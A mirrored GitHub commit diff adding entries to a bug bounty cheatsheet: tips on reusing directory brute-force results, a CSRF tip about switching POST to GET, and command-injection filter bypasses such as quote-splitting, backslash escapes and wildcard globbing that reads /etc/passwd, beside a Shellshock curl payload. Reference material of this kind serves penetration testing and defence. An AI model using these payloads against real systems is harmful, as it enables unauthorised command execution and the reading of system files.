mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-21 18:53:01 +00:00
EdOverflow
GitHub
commit
e02b0c34a1
2 changed files with 29 additions and 1 deletions
|
|
@ -29,3 +29,10 @@ Look for *hackathon-related* assets. What I mean by this is sometimes companies
|
|||
**Tip #6**
|
||||
|
||||
Keep all your directory brute force results so when a CVE like Drupalgeddon2 comes out, you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less)/
|
||||
|
||||
|
||||
|
||||
**Tip #7**
|
||||
|
||||
When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score.
|
||||
For example, demonstrating a CSRF can be exploited simply by using \[img\] tag is better than having to send a link to the victim.
|
||||
|
|
|
|||
|
|
@ -10,6 +10,27 @@ strіng
|
|||
|
||||
If the target is running their application in debug mode you might be able to run commands. If you are running the target locally, you can probably brute-force the debugger PIN. The debugger PIN is always in the following format: `***-***-***`.
|
||||
|
||||
**Basic Bypasses**
|
||||
|
||||
```
|
||||
i'''d
|
||||
i"""d
|
||||
```
|
||||
|
||||
```
|
||||
\l\s -l\a\h
|
||||
```
|
||||
|
||||
```
|
||||
cat /e?c/p?ss??
|
||||
cat /e??/??ss*
|
||||
```
|
||||
|
||||
```
|
||||
{ls,}
|
||||
{ls,-a}
|
||||
```
|
||||
|
||||
**Shellshock Bug**
|
||||
|
||||
```bash
|
||||
|
|
@ -18,4 +39,4 @@ If the target is running their application in debug mode you might be able to ru
|
|||
|
||||
```zsh
|
||||
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
|
||||
```
|
||||
```
|
||||
|
|
|
|||
Loading…
Reference in a new issue